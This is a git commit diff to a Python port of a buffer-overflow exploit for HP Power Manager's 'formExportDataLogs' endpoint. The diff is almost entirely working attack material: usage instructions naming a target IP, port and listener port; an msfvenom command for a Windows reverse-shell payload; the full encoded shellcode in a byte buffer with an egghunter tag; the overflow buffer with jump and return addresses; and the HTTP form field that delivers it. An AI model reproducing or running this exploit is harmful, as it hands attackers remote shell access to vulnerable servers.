Fix broken bad characters

0xG0ez · 0xG0ez · commit c805eedd5240 · 2025-03-08T14:30:41.000+01:00
Use c-style variable
diff --git a/hp_pm_exploit_p3.py b/hp_pm_exploit_p3.py
@@ -1,7 +1,7 @@
-#!/usr/bin/python
+#!/usr/bin/python3
 # This is a python3 port / extension of the HP Power Manager 'formExportDataLogs' Buffer Overflow Script by Muhammad Haidari
 # For the original script visit: https://github.com/Muhammd/HP-Power-Manager
-# 
+#
 # Usage: python3 hp_pm_exploit_p3.py <Remote IP Address> <Remote Port> <Local Listener Port>
 # <Remote IP Address>: ip address the HP Power Manager is running on
 # <Remote Port>: port the application is running on
@@ -23,41 +23,41 @@
    LPORT = int(argv[3]) # port the shellcode is connecting back to -> listener gets sta
    if (len(argv)>4):
       raise IndexError
-except IndexError: 
+except IndexError:
    print("Usage: python3 %s <Remote IP Address> <Remote Port> <Local Listener Port>" % argv[0])
    print("Example: python3 %s 10.10.0.1 80 4411" % argv[0])
    exit()
 
-#msfvenom -p windows/shell_reverse_tcp LHOST=<Your IP> LPORT=4411  EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' x86/alpha_mixed --platform windows -f python
-egg = "b33fb33f"
-buf = egg
-buf += "\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81"
-buf += "\x1f\x0e\xd2\x8c\x95\x88\x83\xee\xfc\xe2\xf4\x2e\x64"
-buf += "\x17\x8f\xd2\x8c\xf5\x01\x37\xbd\x25\xec\x59\xdc\xa5"
-buf += "\x13\x30\x80\x1e\xda\xc6\x07\xe7\xa0\xdd\x3b\xdf\xae"
-buf += "\xe3\x73\x39\xb4\xb3\xf0\x97\xa4\xf2\x4d\x5a\x85\xd3"
-buf += "\x3b\x77\x7a\x80\xdb\x1e\xda\xa2\x07\xdf\xb4\x59\xc0"
-buf += "\x84\xf0\x31\xc4\x94\x59\x83\x07\xcc\xa8\xd3\x5f\x1e"
-buf += "\xcc\xca\x6f\xaf\xc1\x59\xb8\x1e\x89\x04\xbd\x6a\x24"
-buf += "\x13\x43\x98\x89\x15\x34\x75\xfd\x24\x8f\xf8\x70\xe9"
-buf += "\xf1\xb1\xfd\x36\xd4\x1e\xd0\xf6\x8d\x46\xee\x59\x80"
-buf += "\xde\x03\x8a\x90\x94\x5b\x59\x88\x1e\x89\x02\x05\xd1"
-buf += "\x2c\xf6\xd7\xce\xe9\x8b\xd6\xc4\x77\x32\xd3\xca\xd2"
-buf += "\x59\x9e\x7e\x05\x8f\xe4\xa6\xba\xd2\x8c\xfd\xff\xa1"
-buf += "\x2e\xca\xdc\xba\xc0\xe2\xae\xd5\x73\x40\x30\x42\x8d"
-buf += "\x35\x88\xfb\x48\xc1\xd8\xba\xa5\x15\xe3\xd2\x73\x40"
-buf += "\xd8\x82\xdc\xc5\xc8\x82\xcc\xc5\xe0\x38\x83\x4a\x68"
-buf += "\x2d\x59\x02\xe2\xd7\xe4\x9f\x83\xd2\x19\xfd\x8a\xd2"
-buf += "\xed\xae\x01\x34\xe6\x85\xde\x85\xe4\x0c\x2d\xa6\xed"
-buf += "\x6a\x5d\x57\x4c\xe1\x24\x2d\xc2\x9d\xfd\x3e\xe4\x65"
-buf += "\x3d\x70\xda\x6a\x5d\xba\xef\xf8\xec\xd2\x05\x76\xdf"
-buf += "\x85\xdb\xa4\x7e\xb8\x9e\xcc\xde\x30\x71\xf3\x4f\x96"
-buf += "\xa8\xa9\x89\xd3\x01\xd1\xac\xc2\x4a\x95\xcc\x86\xdc"
-buf += "\xc3\xde\x84\xca\xc3\xc6\x84\xda\xc6\xde\xba\xf5\x59"
-buf += "\xb7\x54\x73\x30\x01\x32\xc2\xc3\xce\x2d\xbc\xfd\x80"
-buf += "\x25\x91\xff\x77\x07\x37\x75\x95\xf8\x86\xfd\x2e\x47"
-buf += "\x31\x28\x77\x07\xb0\x93\xf4\xd8\x0c\x6e\x68\xa7\x89"
-buf += "\x2e\xff\xc1\xfe\xfa\xf2\xd2\xdf\x6a\x5d"
+#msfvenom -p windows/shell_reverse_tcp LHOST=<Your IP> LPORT=4411  EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24' x86/alpha_mixed --platform windows -f c
+# add reverse shell after 'b33fb33f'
+buf = ("b33fb33f"
+"\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81"
+"\x1f\x0e\xd2\x8c\x95\x88\x83\xee\xfc\xe2\xf4\x2e\x64"
+"\x17\x8f\xd2\x8c\xf5\x01\x37\xbd\x25\xec\x59\xdc\xa5"
+"\x13\x30\x80\x1e\xda\xc6\x07\xe7\xa0\xdd\x3b\xdf\xae"
+"\xe3\x73\x39\xb4\xb3\xf0\x97\xa4\xf2\x4d\x5a\x85\xd3"
+"\x3b\x77\x7a\x80\xdb\x1e\xda\xa2\x07\xdf\xb4\x59\xc0"
+"\x84\xf0\x31\xc4\x94\x59\x83\x07\xcc\xa8\xd3\x5f\x1e"
+"\xcc\xca\x6f\xaf\xc1\x59\xb8\x1e\x89\x04\xbd\x6a\x24"
+"\x13\x43\x98\x89\x15\x34\x75\xfd\x24\x8f\xf8\x70\xe9"
+"\xf1\xb1\xfd\x36\xd4\x1e\xd0\xf6\x8d\x46\xee\x59\x80"
+"\xde\x03\x8a\x90\x94\x5b\x59\x88\x1e\x89\x02\x05\xd1"
+"\x2c\xf6\xd7\xce\xe9\x8b\xd6\xc4\x77\x32\xd3\xca\xd2"
+"\x59\x9e\x7e\x05\x8f\xe4\xa6\xba\xd2\x8c\xfd\xff\xa1"
+"\x2e\xca\xdc\xba\xc0\xe2\xae\xd5\x73\x40\x30\x42\x8d"
+"\x35\x88\xfb\x48\xc1\xd8\xba\xa5\x15\xe3\xd2\x73\x40"
+"\xd8\x82\xdc\xc5\xc8\x82\xcc\xc5\xe0\x38\x83\x4a\x68"
+"\x2d\x59\x02\xe2\xd7\xe4\x9f\x83\xd2\x19\xfd\x8a\xd2"
+"\xed\xae\x01\x34\xe6\x85\xde\x85\xe4\x0c\x2d\xa6\xed"
+"\x6a\x5d\x57\x4c\xe1\x24\x2d\xc2\x9d\xfd\x3e\xe4\x65"
+"\x3d\x70\xda\x6a\x5d\xba\xef\xf8\xec\xd2\x05\x76\xdf"
+"\x85\xdb\xa4\x7e\xb8\x9e\xcc\xde\x30\x71\xf3\x4f\x96"
+"\xa8\xa9\x89\xd3\x01\xd1\xac\xc2\x4a\x95\xcc\x86\xdc"
+"\xc3\xde\x84\xca\xc3\xc6\x84\xda\xc6\xde\xba\xf5\x59"
+"\xb7\x54\x73\x30\x01\x32\xc2\xc3\xce\x2d\xbc\xfd\x80"
+"\x25\x91\xff\x77\x07\x37\x75\x95\xf8\x86\xfd\x2e\x47"
+"\x31\x28\x77\x07\xb0\x93\xf4\xd8\x0c\x6e\x68\xa7\x89"
+"\x2e\xff\xc1\xfe\xfa\xf2\xd2\xdf\x6a\x5d")
 
 #egghunter.rb -f python -b '\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\$%\x1a' -e b33f -v 'hunter'
 hunter =  b""
@@ -67,7 +67,7 @@
 
 buffer = b"\x41" * (721 -len(hunter))
 buffer += b"\x90"*30 + hunter
-buffer += b"\xeb\xc2\x90\x90"            #JMP SHORT 0xC2 
+buffer += b"\xeb\xc2\x90\x90"            #JMP SHORT 0xC2
 buffer += b"\xd5\x74\x41" 	              #pop esi # pop ebx # ret 10 (DevManBE.exe)
 
 content= "dataFormat=comma&exportto=file&fileName=%s" % parse.quote_plus(buffer)
